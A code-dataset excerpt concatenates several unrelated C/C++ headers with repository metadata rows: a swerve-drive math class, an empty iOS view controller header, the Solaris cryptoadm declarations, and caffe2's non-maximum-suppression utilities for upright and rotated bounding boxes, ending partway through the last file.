* centric mode causes the swerve system to always keep the forward/backward and
* directional movement to stay relative to zero degrees. Robot centric mode
* causes the swerve system to act with normal cartesian movement.
*/
class SwerveMath {
public:
/*
* Requires the length and width between swerve wheels in order to have
* be accurate with calculations.
*/
SwerveMath(double length, double width);
/*
* Uses foward speed, strafing speed, and rotational speed values to calculate
* the required angle and speed for each wheel. An angle can also be given so
* that field centric mode can be used. If no angle is given (or equal to -999)
* robot centric will be used.
*
* FORWARD: positive value = forward movement, negative value = backward
* movement
* STRAFE: positive value = right direction, negative value = left direction
* ROTATION: positive value = clockwise rotation, negative value =
* counterclockwise rotation
*
* Method outputs an array of speed and rotation value for each wheel.
* 0 1
* 0 Front Left Speed Front Left Angle
* 1 Front Right Speed Front Right Angle
* 2 Rear Left Speed Rear Left Angle
* 3 Rear Right Speed Rear Right Angle
*/
double** Calculate(double fwd, double str, double rot, double angle = -999);
private:
static constexpr double NO_ANGLE = -999;
static constexpr double PI = M_PI;
/*
* Copies the speed and angle values into a pointer in order to be used by
* the enclosures
*/
double** CopyArray(double array[][2]);
double LENGTH, WIDTH;
double R;
}; | 33.296296 | 82 | 0.724694 |
93428b50ed5044066f508719c292dde649e9b4f5 | 278 | h | C | fansky/Controllers/SAFavoriteTimeLineViewController.h | simpleapples/fansky | 5d495a86f1b8b73005861a24082f5a3daaa997e6 | [
"MIT"
] | 83 | 2015-09-24T15:33:53.000Z | 2021-11-23T09:15:42.000Z | fansky/Controllers/SAFavoriteTimeLineViewController.h | simpleapples/fansky | 5d495a86f1b8b73005861a24082f5a3daaa997e6 | [
"MIT"
] | 3 | 2015-09-13T02:09:59.000Z | 2019-11-07T08:37:53.000Z | fansky/Controllers/SAFavoriteTimeLineViewController.h | simpleapples/fansky | 5d495a86f1b8b73005861a24082f5a3daaa997e6 | [
"MIT"
] | 31 | 2015-09-13T02:04:28.000Z | 2019-08-23T13:52:31.000Z | //
// SAFavoriteTimeLineViewController.h
// fansky
//
// Created by Zzy on 10/18/15.
// Copyright © 2015 Zzy. All rights reserved.
//
#import <UIKit/UIKit.h>
#import "SATimeLineViewController.h"
@interface SAFavoriteTimeLineViewController : SATimeLineViewController
@end
| 18.533333 | 70 | 0.748201 |
4f42dd1627f38feaf536e2185674b8c0b4822ce4 | 6,165 | h | C | usr/src/cmd/cmd-crypto/cryptoadm/cryptoadm.h | AsahiOS/gate | 283d47da4e17a5871d9d575e7ffb81e8f6c52e51 | [
"MIT"
] | null | null | null | usr/src/cmd/cmd-crypto/cryptoadm/cryptoadm.h | AsahiOS/gate | 283d47da4e17a5871d9d575e7ffb81e8f6c52e51 | [
"MIT"
] | null | null | null | usr/src/cmd/cmd-crypto/cryptoadm/cryptoadm.h | AsahiOS/gate | 283d47da4e17a5871d9d575e7ffb81e8f6c52e51 | [
"MIT"
] | 1 | 2020-12-30T00:04:16.000Z | 2020-12-30T00:04:16.000Z | /*
* CDDL HEADER START
*
* The contents of this file are subject to the terms of the
* Common Development and Distribution License (the "License").
* You may not use this file except in compliance with the License.
*
* You can obtain a copy of the license at usr/src/OPENSOLARIS.LICENSE
* or http://www.opensolaris.org/os/licensing.
* See the License for the specific language governing permissions
* and limitations under the License.
*
* When distributing Covered Code, include this CDDL HEADER in each
* file and include the License file at usr/src/OPENSOLARIS.LICENSE.
* If applicable, add the following below this CDDL HEADER, with the
* fields enclosed by brackets "[]" replaced with your own identifying
* information: Portions Copyright [yyyy] [name of copyright owner]
*
* CDDL HEADER END
*/
/*
* Copyright (c) 2003, 2010, Oracle and/or its affiliates. All rights reserved.
*/
/*
* Copyright 2010 Nexenta Systems, Inc. All rights reserved.
*/
#ifndef _CRYPTOADM_H
#define _CRYPTOADM_H
#include <sys/types.h>
#include <sys/crypto/ioctladmin.h>
#include <cryptoutil.h>
#include <security/cryptoki.h>
#ifdef __cplusplus
extern "C" {
#endif
#define TMPFILE_TEMPLATE "/etc/crypto/admXXXXXX"
#define ERROR_USAGE 2
#define HW_PROVIDER_NCP 1
#define HW_PROVIDER_N2CP 2
#define HW_PROVIDER_N2RNG 3
/*
* Common keywords and delimiters for pkcs11.conf and kcf.conf files are
* defined in usr/lib/libcryptoutil/common/cryptoutil.h. The following is
* the extra keywords and delimiters used in kcf.conf file.
*/
#define SEP_SLASH '/'
#define EF_SUPPORTED "supportedlist="
#define EF_UNLOAD "unload"
#define RANDOM "random"
#define UEF_FRAME_LIB "/usr/lib/libpkcs11.so"
#define ADD_MODE 1
#define DELETE_MODE 2
#define MODIFY_MODE 3
#define REFRESH 1
#define NOT_REFRESH 0
typedef char prov_name_t[MAXNAMELEN];
typedef char mech_name_t[CRYPTO_MAX_MECH_NAME];
typedef struct mechlist {
mech_name_t name;
struct mechlist *next;
} mechlist_t;
typedef struct entry {
prov_name_t name;
mechlist_t *suplist; /* supported list */
uint_t sup_count;
mechlist_t *dislist; /* disabled list */
uint_t dis_count;
boolean_t load; /* B_FALSE after cryptoadm unload */
} entry_t;
typedef struct entrylist {
entry_t *pent;
struct entrylist *next;
} entrylist_t;
typedef enum {
NO_RNG,
HAS_RNG
} flag_val_t;
extern int errno;
/* adm_util */
extern boolean_t is_in_list(char *, mechlist_t *);
extern mechlist_t *create_mech(char *);
extern void free_mechlist(mechlist_t *);
/* adm_kef_util */
extern boolean_t is_device(char *);
extern char *ent2str(entry_t *);
extern entry_t *getent_kef(char *provname,
entrylist_t *pdevlist, entrylist_t *psoftlist);
extern int check_kernel_for_soft(char *provname,
crypto_get_soft_list_t *psoftlist, boolean_t *in_kernel);
extern int check_kernel_for_hard(char *provname,
crypto_get_dev_list_t *pdevlist, boolean_t *in_kernel);
extern int disable_mechs(entry_t **, mechlist_t *, boolean_t, mechlist_t *);
extern int enable_mechs(entry_t **, boolean_t, mechlist_t *);
extern int get_kcfconf_info(entrylist_t **, entrylist_t **);
extern int get_admindev_info(entrylist_t **, entrylist_t **);
extern int get_mech_count(mechlist_t *);
extern entry_t *create_entry(char *provname);
extern int insert_kcfconf(entry_t *);
extern int split_hw_provname(char *, char *, int *);
extern int update_kcfconf(entry_t *, int);
extern void free_entry(entry_t *);
extern void free_entrylist(entrylist_t *);
extern void print_mechlist(char *, mechlist_t *);
extern void print_kef_policy(char *provname, entry_t *pent,
boolean_t has_random, boolean_t has_mechs);
extern boolean_t filter_mechlist(mechlist_t **, const char *);
extern uentry_t *getent_uef(char *);
/* adm_uef */
extern int list_mechlist_for_lib(char *, mechlist_t *, flag_val_t *,
boolean_t, boolean_t, boolean_t);
extern int list_policy_for_lib(char *);
extern int disable_uef_lib(char *, boolean_t, boolean_t, mechlist_t *);
extern int enable_uef_lib(char *, boolean_t, boolean_t, mechlist_t *);
extern int install_uef_lib(char *);
extern int uninstall_uef_lib(char *);
extern int print_uef_policy(uentry_t *);
extern void display_token_flags(CK_FLAGS flags);
extern int convert_mechlist(CK_MECHANISM_TYPE **, CK_ULONG *, mechlist_t *);
extern void display_verbose_mech_header();
extern void display_mech_info(CK_MECHANISM_INFO *);
extern int display_policy(uentry_t *);
extern int update_pkcs11conf(uentry_t *);
extern int update_policylist(uentry_t *, mechlist_t *, int);
/* adm_kef */
extern int list_mechlist_for_soft(char *provname,
entrylist_t *phardlist, entrylist_t *psoftlist);
extern int list_mechlist_for_hard(char *);
extern int list_policy_for_soft(char *provname,
entrylist_t *phardlist, entrylist_t *psoftlist);
extern int list_policy_for_hard(char *provname,
entrylist_t *phardlist, entrylist_t *psoftlist,
crypto_get_dev_list_t *pdevlist);
extern int disable_kef_software(char *, boolean_t, boolean_t, mechlist_t *);
extern int disable_kef_hardware(char *, boolean_t, boolean_t, mechlist_t *);
extern int enable_kef(char *, boolean_t, boolean_t, mechlist_t *);
extern int install_kef(char *, mechlist_t *);
extern int uninstall_kef(char *);
extern int unload_kef_soft(char *provname);
extern int refresh(void);
/* adm_ioctl */
extern crypto_load_soft_config_t *setup_soft_conf(entry_t *);
extern crypto_load_soft_disabled_t *setup_soft_dis(entry_t *);
extern crypto_load_dev_disabled_t *setup_dev_dis(entry_t *);
extern crypto_unload_soft_module_t *setup_unload_soft(entry_t *);
extern int get_dev_info(char *, int, int, mechlist_t **);
extern int get_dev_list(crypto_get_dev_list_t **);
extern int get_soft_info(char *provname, mechlist_t **ppmechlist,
entrylist_t *phardlist, entrylist_t *psoftlist);
extern int get_soft_list(crypto_get_soft_list_t **);
/* adm_metaslot */
extern int list_metaslot_info(boolean_t, boolean_t, mechlist_t *);
extern int list_metaslot_policy();
extern int disable_metaslot(mechlist_t *, boolean_t, boolean_t);
extern int enable_metaslot(char *, char *, boolean_t, mechlist_t *, boolean_t,
boolean_t);
#ifdef __cplusplus
}
#endif
#endif /* _CRYPTOADM_H */
| 33.145161 | 79 | 0.773398 |
7fb9c3767cf351387b75addc9a01e53148977dbb | 26,176 | h | C | caffe2/operators/generate_proposals_op_util_nms.h | ZIZUN/pytorch | f565167fbdf607f3b0b95f077b11f2f78716c217 | [
"Intel"
] | 183 | 2018-04-06T21:10:36.000Z | 2022-03-30T15:05:24.000Z | caffe2/operators/generate_proposals_op_util_nms.h | ZIZUN/pytorch | f565167fbdf607f3b0b95f077b11f2f78716c217 | [
"Intel"
] | 631 | 2018-06-05T16:59:11.000Z | 2022-03-31T16:26:57.000Z | caffe2/operators/generate_proposals_op_util_nms.h | ZIZUN/pytorch | f565167fbdf607f3b0b95f077b11f2f78716c217 | [
"Intel"
] | 58 | 2018-06-05T16:40:18.000Z | 2022-03-16T15:37:29.000Z | #ifndef CAFFE2_OPERATORS_UTILS_NMS_H_
#define CAFFE2_OPERATORS_UTILS_NMS_H_
#include <vector>
#include "caffe2/core/logging.h"
#include "caffe2/core/macros.h"
#include "caffe2/utils/eigen_utils.h"
#include "caffe2/utils/math.h"
#include <c10/util/irange.h>
namespace caffe2 {
namespace utils {
// Greedy non-maximum suppression for proposed bounding boxes
// Reject a bounding box if its region has an intersection-overunion (IoU)
// overlap with a higher scoring selected bounding box larger than a
// threshold.
// Reference: facebookresearch/Detectron/detectron/utils/cython_nms.pyx
// proposals: pixel coordinates of proposed bounding boxes,
// size: (M, 4), format: [x1; y1; x2; y2]
// scores: scores for each bounding box, size: (M, 1)
// sorted_indices: indices that sorts the scores from high to low
// return: row indices of the selected proposals
template <class Derived1, class Derived2>
std::vector<int> nms_cpu_upright(
const Eigen::ArrayBase<Derived1>& proposals,
const Eigen::ArrayBase<Derived2>& scores,
const std::vector<int>& sorted_indices,
float thresh,
int topN = -1,
bool legacy_plus_one = false) {
CAFFE_ENFORCE_EQ(proposals.rows(), scores.rows());
CAFFE_ENFORCE_EQ(proposals.cols(), 4);
CAFFE_ENFORCE_EQ(scores.cols(), 1);
CAFFE_ENFORCE_LE(sorted_indices.size(), proposals.rows());
using EArrX = EArrXt<typename Derived1::Scalar>;
auto x1 = proposals.col(0);
auto y1 = proposals.col(1);
auto x2 = proposals.col(2);
auto y2 = proposals.col(3);
EArrX areas =
(x2 - x1 + int(legacy_plus_one)) * (y2 - y1 + int(legacy_plus_one));
EArrXi order = AsEArrXt(sorted_indices);
std::vector<int> keep;
while (order.size() > 0) {
// exit if already enough proposals
// NOLINTNEXTLINE(clang-diagnostic-sign-compare)
if (topN >= 0 && keep.size() >= topN) {
break;
}
int i = order[0];
keep.push_back(i);
ConstEigenVectorArrayMap<int> rest_indices(
order.data() + 1, order.size() - 1);
EArrX xx1 = GetSubArray(x1, rest_indices).cwiseMax(x1[i]);
EArrX yy1 = GetSubArray(y1, rest_indices).cwiseMax(y1[i]);
EArrX xx2 = GetSubArray(x2, rest_indices).cwiseMin(x2[i]);
EArrX yy2 = GetSubArray(y2, rest_indices).cwiseMin(y2[i]);
EArrX w = (xx2 - xx1 + int(legacy_plus_one)).cwiseMax(0.0);
EArrX h = (yy2 - yy1 + int(legacy_plus_one)).cwiseMax(0.0);
EArrX inter = w * h;
EArrX ovr = inter / (areas[i] + GetSubArray(areas, rest_indices) - inter);
// indices for sub array order[1:n]
auto inds = GetArrayIndices(ovr <= thresh);
order = GetSubArray(order, AsEArrXt(inds) + 1);
}
return keep;
}
/**
* Soft-NMS implementation as outlined in https://arxiv.org/abs/1704.04503.
* Reference: facebookresearch/Detectron/detectron/utils/cython_nms.pyx
* out_scores: Output updated scores after applying Soft-NMS
* proposals: pixel coordinates of proposed bounding boxes,
* size: (M, 4), format: [x1; y1; x2; y2]
* size: (M, 5), format: [ctr_x; ctr_y; w; h; angle (degrees)] for RRPN
* scores: scores for each bounding box, size: (M, 1)
* indices: Indices to consider within proposals and scores. Can be used
* to pre-filter proposals/scores based on some threshold.
* sigma: Standard deviation for Gaussian
* overlap_thresh: Similar to original NMS
* score_thresh: If updated score falls below this thresh, discard proposal
* method: 0 - Hard (original) NMS, 1 - Linear, 2 - Gaussian
* return: row indices of the selected proposals
*/
template <class Derived1, class Derived2, class Derived3>
std::vector<int> soft_nms_cpu_upright(
Eigen::ArrayBase<Derived3>* out_scores,
const Eigen::ArrayBase<Derived1>& proposals,
const Eigen::ArrayBase<Derived2>& scores,
const std::vector<int>& indices,
float sigma = 0.5,
float overlap_thresh = 0.3,
float score_thresh = 0.001,
unsigned int method = 1,
int topN = -1,
bool legacy_plus_one = false) {
CAFFE_ENFORCE_EQ(proposals.rows(), scores.rows());
CAFFE_ENFORCE_EQ(proposals.cols(), 4);
CAFFE_ENFORCE_EQ(scores.cols(), 1);
using EArrX = EArrXt<typename Derived1::Scalar>;
const auto& x1 = proposals.col(0);
const auto& y1 = proposals.col(1);
const auto& x2 = proposals.col(2);
const auto& y2 = proposals.col(3);
EArrX areas =
(x2 - x1 + int(legacy_plus_one)) * (y2 - y1 + int(legacy_plus_one));
// Initialize out_scores with original scores. Will be iteratively updated
// as Soft-NMS is applied.
*out_scores = scores;
std::vector<int> keep;
EArrXi pending = AsEArrXt(indices);
while (pending.size() > 0) {
// Exit if already enough proposals
if (topN >= 0 && keep.size() >= topN) {
break;
}
// Find proposal with max score among remaining proposals
int max_pos;
GetSubArray(*out_scores, pending).maxCoeff(&max_pos);
int i = pending[max_pos];
keep.push_back(i);
// Compute IoU of the remaining boxes with the identified max box
std::swap(pending(0), pending(max_pos));
const auto& rest_indices = pending.tail(pending.size() - 1);
EArrX xx1 = GetSubArray(x1, rest_indices).cwiseMax(x1[i]);
EArrX yy1 = GetSubArray(y1, rest_indices).cwiseMax(y1[i]);
EArrX xx2 = GetSubArray(x2, rest_indices).cwiseMin(x2[i]);
EArrX yy2 = GetSubArray(y2, rest_indices).cwiseMin(y2[i]);
EArrX w = (xx2 - xx1 + int(legacy_plus_one)).cwiseMax(0.0);
EArrX h = (yy2 - yy1 + int(legacy_plus_one)).cwiseMax(0.0);
EArrX inter = w * h;
EArrX ovr = inter / (areas[i] + GetSubArray(areas, rest_indices) - inter);
// Update scores based on computed IoU, overlap threshold and NMS method
for (const auto j : c10::irange(rest_indices.size())) {
typename Derived2::Scalar weight;
switch (method) {
case 1: // Linear
weight = (ovr(j) > overlap_thresh) ? (1.0 - ovr(j)) : 1.0;
break;
case 2: // Gaussian
weight = std::exp(-1.0 * ovr(j) * ovr(j) / sigma);
break;
default: // Original NMS
weight = (ovr(j) > overlap_thresh) ? 0.0 : 1.0;
}
(*out_scores)(rest_indices[j]) *= weight;
}
// Discard boxes with new scores below min threshold and update pending
// indices
const auto& rest_scores = GetSubArray(*out_scores, rest_indices);
const auto& inds = GetArrayIndices(rest_scores >= score_thresh);
pending = GetSubArray(rest_indices, AsEArrXt(inds));
}
return keep;
}
namespace {
const int INTERSECT_NONE = 0;
const int INTERSECT_PARTIAL = 1;
const int INTERSECT_FULL = 2;
class RotatedRect {
public:
RotatedRect() {}
RotatedRect(
const Eigen::Vector2f& p_center,
const Eigen::Vector2f& p_size,
float p_angle)
: center(p_center), size(p_size), angle(p_angle) {}
void get_vertices(Eigen::Vector2f* pt) const {
// M_PI / 180. == 0.01745329251
double _angle = angle * 0.01745329251;
float b = (float)cos(_angle) * 0.5f;
float a = (float)sin(_angle) * 0.5f;
pt[0].x() = center.x() - a * size.y() - b * size.x();
pt[0].y() = center.y() + b * size.y() - a * size.x();
pt[1].x() = center.x() + a * size.y() - b * size.x();
pt[1].y() = center.y() - b * size.y() - a * size.x();
pt[2] = 2 * center - pt[0];
pt[3] = 2 * center - pt[1];
}
Eigen::Vector2f center;
Eigen::Vector2f size;
float angle;
};
template <class Derived>
RotatedRect bbox_to_rotated_rect(const Eigen::ArrayBase<Derived>& box) {
CAFFE_ENFORCE_EQ(box.size(), 5);
// cv::RotatedRect takes angle to mean clockwise rotation, but RRPN bbox
// representation means counter-clockwise rotation.
return RotatedRect(
Eigen::Vector2f(box[0], box[1]),
Eigen::Vector2f(box[2], box[3]),
-box[4]);
}
// Eigen doesn't seem to support 2d cross product, so we make one here
float cross_2d(const Eigen::Vector2f& A, const Eigen::Vector2f& B) {
return A.x() * B.y() - B.x() * A.y();
}
// rotated_rect_intersection_pts is a replacement function for
// cv::rotatedRectangleIntersection, which has a bug due to float underflow
// For anyone interested, here're the PRs on OpenCV:
// https://github.com/opencv/opencv/issues/12221
// https://github.com/opencv/opencv/pull/12222
// Note that we do not check if the number of intersections is <= 8 in this case
int rotated_rect_intersection_pts(
const RotatedRect& rect1,
const RotatedRect& rect2,
Eigen::Vector2f* intersections,
int& num) {
// Used to test if two points are the same
const float samePointEps = 0.00001f;
const float EPS = 1e-14;
num = 0; // number of intersections
Eigen::Vector2f vec1[4], vec2[4], pts1[4], pts2[4];
rect1.get_vertices(pts1);
rect2.get_vertices(pts2);
// Specical case of rect1 == rect2
bool same = true;
for (const auto i : c10::irange(4)) {
if (fabs(pts1[i].x() - pts2[i].x()) > samePointEps ||
(fabs(pts1[i].y() - pts2[i].y()) > samePointEps)) {
same = false;
break;
}
}
if (same) {
for (const auto i : c10::irange(4)) {
intersections[i] = pts1[i];
}
num = 4;
return INTERSECT_FULL;
}
// Line vector
// A line from p1 to p2 is: p1 + (p2-p1)*t, t=[0,1]
for (const auto i : c10::irange(4)) {
vec1[i] = pts1[(i + 1) % 4] - pts1[i];
vec2[i] = pts2[(i + 1) % 4] - pts2[i];
}
// Line test - test all line combos for intersection
for (const auto i : c10::irange(4)) {
for (const auto j : c10::irange(4)) {
// Solve for 2x2 Ax=b
// This takes care of parallel lines
float det = cross_2d(vec2[j], vec1[i]);
if (std::fabs(det) <= EPS) {
continue;
}
auto vec12 = pts2[j] - pts1[i];
float t1 = cross_2d(vec2[j], vec12) / det;
float t2 = cross_2d(vec1[i], vec12) / det;
if (t1 >= 0.0f && t1 <= 1.0f && t2 >= 0.0f && t2 <= 1.0f) {
intersections[num++] = pts1[i] + t1 * vec1[i];
}
}
}
// Check for vertices from rect1 inside rect2
{
const auto& AB = vec2[0];
const auto& DA = vec2[3];
auto ABdotAB = AB.squaredNorm();
auto ADdotAD = DA.squaredNorm();
for (const auto i : c10::irange(4)) {
// assume ABCD is the rectangle, and P is the point to be judged
// P is inside ABCD iff. P's projection on AB lies within AB
// and P's projection on AD lies within AD
auto AP = pts1[i] - pts2[0];
auto APdotAB = AP.dot(AB);
auto APdotAD = -AP.dot(DA);
if ((APdotAB >= 0) && (APdotAD >= 0) && (APdotAB <= ABdotAB) &&
(APdotAD <= ADdotAD)) {
intersections[num++] = pts1[i];
}
}
}
// Reverse the check - check for vertices from rect2 inside rect1
{
const auto& AB = vec1[0];
const auto& DA = vec1[3];
auto ABdotAB = AB.squaredNorm();
auto ADdotAD = DA.squaredNorm();
for (const auto i : c10::irange(4)) {
auto AP = pts2[i] - pts1[0];
auto APdotAB = AP.dot(AB);
auto APdotAD = -AP.dot(DA);
if ((APdotAB >= 0) && (APdotAD >= 0) && (APdotAB <= ABdotAB) &&
(APdotAD <= ADdotAD)) {
intersections[num++] = pts2[i];
}
}
}
return num ? INTERSECT_PARTIAL : INTERSECT_NONE;
}
// Compute convex hull using Graham scan algorithm
int convex_hull_graham(
const Eigen::Vector2f* p,
const int& num_in,
Eigen::Vector2f* q,
bool shift_to_zero = false) {
CAFFE_ENFORCE(num_in >= 2);
std::vector<int> order;
// Step 1:
// Find point with minimum y
// if more than 1 points have the same minimum y,
// pick the one with the mimimum x.
int t = 0;
for (const auto i : c10::irange(1, num_in)) {
if (p[i].y() < p[t].y() || (p[i].y() == p[t].y() && p[i].x() < p[t].x())) {
t = i;
}
}
auto& s = p[t]; // starting point
// Step 2:
// Subtract starting point from every points (for sorting in the next step)
for (const auto i : c10::irange(num_in)) {
q[i] = p[i] - s;
}
// Swap the starting point to position 0
std::swap(q[0], q[t]);
// Step 3:
// Sort point 1 ~ num_in according to their relative cross-product values
// (essentially sorting according to angles)
std::sort(
q + 1,
q + num_in,
[](const Eigen::Vector2f& A, const Eigen::Vector2f& B) -> bool {
float temp = cross_2d(A, B);
if (fabs(temp) < 1e-6) {
return A.squaredNorm() < B.squaredNorm();
} else {
return temp > 0;
}
});
// Step 4:
// Make sure there are at least 2 points (that don't overlap with each other)
// in the stack
int k; // index of the non-overlapped second point
for (k = 1; k < num_in; k++) {
if (q[k].squaredNorm() > 1e-8)
break;
}
if (k == num_in) {
// We reach the end, which means the convex hull is just one point
q[0] = p[t];
return 1;
}
q[1] = q[k];
int m = 2; // 2 elements in the stack
// Step 5:
// Finally we can start the scanning process.
// If we find a non-convex relationship between the 3 points,
// we pop the previous point from the stack until the stack only has two
// points, or the 3-point relationship is convex again
for (int i = k + 1; i < num_in; i++) {
while (m > 1 && cross_2d(q[i] - q[m - 2], q[m - 1] - q[m - 2]) >= 0) {
m--;
}
q[m++] = q[i];
}
// Step 6 (Optional):
// In general sense we need the original coordinates, so we
// need to shift the points back (reverting Step 2)
// But if we're only interested in getting the area/perimeter of the shape
// We can simply return.
if (!shift_to_zero) {
for (const auto i : c10::irange(m))q[i] += s;
}
return m;
}
double polygon_area(const Eigen::Vector2f* q, const int& m) {
if (m <= 2)
return 0;
double area = 0;
for (int i = 1; i < m - 1; i++)
area += fabs(cross_2d(q[i] - q[0], q[i + 1] - q[0]));
return area / 2.0;
}
/**
* Returns the intersection area of two rotated rectangles.
*/
double rotated_rect_intersection(
const RotatedRect& rect1,
const RotatedRect& rect2) {
// There are up to 4 x 4 + 4 + 4 = 24 intersections (including dups) returned
// from rotated_rect_intersection_pts
Eigen::Vector2f intersectPts[24], orderedPts[24];
int num = 0; // number of intersections
// Find points of intersection
// TODO: rotated_rect_intersection_pts is a replacement function for
// cv::rotatedRectangleIntersection, which has a bug due to float underflow
// For anyone interested, here're the PRs on OpenCV:
// https://github.com/opencv/opencv/issues/12221
// https://github.com/opencv/opencv/pull/12222
// Note: it doesn't matter if #intersections is greater than 8 here
auto ret = rotated_rect_intersection_pts(rect1, rect2, intersectPts, num);
if (num > 24) {
// should never happen
string msg = "";
msg += "num_intersections = " + to_string(num);
msg += "; rect1.center = (" + to_string(rect1.center.x()) + ", " +
to_string(rect1.center.y()) + "), ";
msg += "rect1.size = (" + to_string(rect1.size.x()) + ", " +
to_string(rect1.size.y()) + "), ";
msg += "rect1.angle = " + to_string(rect1.angle);
msg += "; rect2.center = (" + to_string(rect2.center.x()) + ", " +
to_string(rect2.center.y()) + "), ";
msg += "rect2.size = (" + to_string(rect2.size.x()) + ", " +
to_string(rect2.size.y()) + "), ";
msg += "rect2.angle = " + to_string(rect2.angle);
CAFFE_ENFORCE(num <= 24, msg);
}
if (num <= 2)
return 0.0;
// If one rectangle is fully enclosed within another, return the area
// of the smaller one early.
if (ret == INTERSECT_FULL) {
return std::min(
rect1.size.x() * rect1.size.y(), rect2.size.x() * rect2.size.y());
}
// Convex Hull to order the intersection points in clockwise or
// counter-clockwise order and find the countour area.
int num_convex = convex_hull_graham(intersectPts, num, orderedPts, true);
return polygon_area(orderedPts, num_convex);
}
} // namespace
/**
* Find the intersection area of two rotated boxes represented in format
* [ctr_x, ctr_y, width, height, angle].
* `angle` represents counter-clockwise rotation in degrees.
*/
template <class Derived1, class Derived2>
double bbox_intersection_rotated(
const Eigen::ArrayBase<Derived1>& box1,
const Eigen::ArrayBase<Derived2>& box2) {
CAFFE_ENFORCE(box1.size() == 5 && box2.size() == 5);
const auto& rect1 = bbox_to_rotated_rect(box1);
const auto& rect2 = bbox_to_rotated_rect(box2);
return rotated_rect_intersection(rect1, rect2);
}
/**
* Similar to `bbox_overlaps()` in detectron/utils/cython_bbox.pyx,
* but handles rotated boxes represented in format
* [ctr_x, ctr_y, width, height, angle].
* `angle` represents counter-clockwise rotation in degrees.
*/
template <class Derived1, class Derived2>
Eigen::ArrayXXf bbox_overlaps_rotated(
const Eigen::ArrayBase<Derived1>& boxes,
const Eigen::ArrayBase<Derived2>& query_boxes) {
CAFFE_ENFORCE(boxes.cols() == 5 && query_boxes.cols() == 5);
const auto& boxes_areas = boxes.col(2) * boxes.col(3);
const auto& query_boxes_areas = query_boxes.col(2) * query_boxes.col(3);
Eigen::ArrayXXf overlaps(boxes.rows(), query_boxes.rows());
for (const auto i : c10::irange(boxes.rows())) {
for (const auto j : c10::irange(query_boxes.rows())) {
auto inter = bbox_intersection_rotated(boxes.row(i), query_boxes.row(j));
overlaps(i, j) = (inter == 0.0)
? 0.0
: inter / (boxes_areas[i] + query_boxes_areas[j] - inter);
}
}
return overlaps;
}
// Similar to nms_cpu_upright, but handles rotated proposal boxes
// in the format:
// size (M, 5), format [ctr_x; ctr_y; width; height; angle (in degrees)].
//
// For now, we only consider IoU as the metric for suppression. No angle info
// is used yet.
template <class Derived1, class Derived2>
std::vector<int> nms_cpu_rotated(
const Eigen::ArrayBase<Derived1>& proposals,
const Eigen::ArrayBase<Derived2>& scores,
const std::vector<int>& sorted_indices,
float thresh,
int topN = -1) {
CAFFE_ENFORCE_EQ(proposals.rows(), scores.rows());
CAFFE_ENFORCE_EQ(proposals.cols(), 5);
CAFFE_ENFORCE_EQ(scores.cols(), 1);
CAFFE_ENFORCE_LE(sorted_indices.size(), proposals.rows());
using EArrX = EArrXt<typename Derived1::Scalar>;
auto widths = proposals.col(2);
auto heights = proposals.col(3);
EArrX areas = widths * heights;
std::vector<RotatedRect> rotated_rects(proposals.rows());
for (const auto i : c10::irange(proposals.rows())) {
rotated_rects[i] = bbox_to_rotated_rect(proposals.row(i));
}
EArrXi order = AsEArrXt(sorted_indices);
std::vector<int> keep;
while (order.size() > 0) {
// exit if already enough proposals
// NOLINTNEXTLINE(clang-diagnostic-sign-compare)
if (topN >= 0 && keep.size() >= topN) {
break;
}
int i = order[0];
keep.push_back(i);
ConstEigenVectorArrayMap<int> rest_indices(
order.data() + 1, order.size() - 1);
EArrX inter(rest_indices.size());
for (const auto j : c10::irange(rest_indices.size())) {
inter[j] = rotated_rect_intersection(
rotated_rects[i], rotated_rects[rest_indices[j]]);
}
EArrX ovr = inter / (areas[i] + GetSubArray(areas, rest_indices) - inter);
// indices for sub array order[1:n].
// TODO (viswanath): Should angle info be included as well while filtering?
auto inds = GetArrayIndices(ovr <= thresh);
order = GetSubArray(order, AsEArrXt(inds) + 1);
}
return keep;
}
// Similar to soft_nms_cpu_upright, but handles rotated proposal boxes
// in the format:
// size (M, 5), format [ctr_x; ctr_y; width; height; angle (in degrees)].
//
// For now, we only consider IoU as the metric for suppression. No angle info
// is used yet.
template <class Derived1, class Derived2, class Derived3>
std::vector<int> soft_nms_cpu_rotated(
Eigen::ArrayBase<Derived3>* out_scores,
const Eigen::ArrayBase<Derived1>& proposals,
const Eigen::ArrayBase<Derived2>& scores,
const std::vector<int>& indices,
float sigma = 0.5,
float overlap_thresh = 0.3,
float score_thresh = 0.001,
unsigned int method = 1,
int topN = -1) {
CAFFE_ENFORCE_EQ(proposals.rows(), scores.rows());
CAFFE_ENFORCE_EQ(proposals.cols(), 5);
CAFFE_ENFORCE_EQ(scores.cols(), 1);
using EArrX = EArrXt<typename Derived1::Scalar>;
auto widths = proposals.col(2);
auto heights = proposals.col(3);
EArrX areas = widths * heights;
std::vector<RotatedRect> rotated_rects(proposals.rows());
for (const auto i : c10::irange(proposals.rows())) {
rotated_rects[i] = bbox_to_rotated_rect(proposals.row(i));
}
// Initialize out_scores with original scores. Will be iteratively updated
// as Soft-NMS is applied.
*out_scores = scores;
std::vector<int> keep;
EArrXi pending = AsEArrXt(indices);
while (pending.size() > 0) {
// Exit if already enough proposals
if (topN >= 0 && keep.size() >= topN) {
break;
}
// Find proposal with max score among remaining proposals
int max_pos;
GetSubArray(*out_scores, pending).maxCoeff(&max_pos);
int i = pending[max_pos];
keep.push_back(i);
// Compute IoU of the remaining boxes with the identified max box
std::swap(pending(0), pending(max_pos));
const auto& rest_indices = pending.tail(pending.size() - 1);
EArrX inter(rest_indices.size());
for (const auto j : c10::irange(rest_indices.size())) {
inter[j] = rotated_rect_intersection(
rotated_rects[i], rotated_rects[rest_indices[j]]);
}
EArrX ovr = inter / (areas[i] + GetSubArray(areas, rest_indices) - inter);
// Update scores based on computed IoU, overlap threshold and NMS method
// TODO (viswanath): Should angle info be included as well while filtering?
for (const auto j : c10::irange(rest_indices.size())) {
typename Derived2::Scalar weight;
switch (method) {
case 1: // Linear
weight = (ovr(j) > overlap_thresh) ? (1.0 - ovr(j)) : 1.0;
break;
case 2: // Gaussian
weight = std::exp(-1.0 * ovr(j) * ovr(j) / sigma);
break;
default: // Original NMS
weight = (ovr(j) > overlap_thresh) ? 0.0 : 1.0;
}
(*out_scores)(rest_indices[j]) *= weight;
}
// Discard boxes with new scores below min threshold and update pending
// indices
const auto& rest_scores = GetSubArray(*out_scores, rest_indices);
const auto& inds = GetArrayIndices(rest_scores >= score_thresh);
pending = GetSubArray(rest_indices, AsEArrXt(inds));
}
return keep;
}
template <class Derived1, class Derived2>
std::vector<int> nms_cpu(
const Eigen::ArrayBase<Derived1>& proposals,
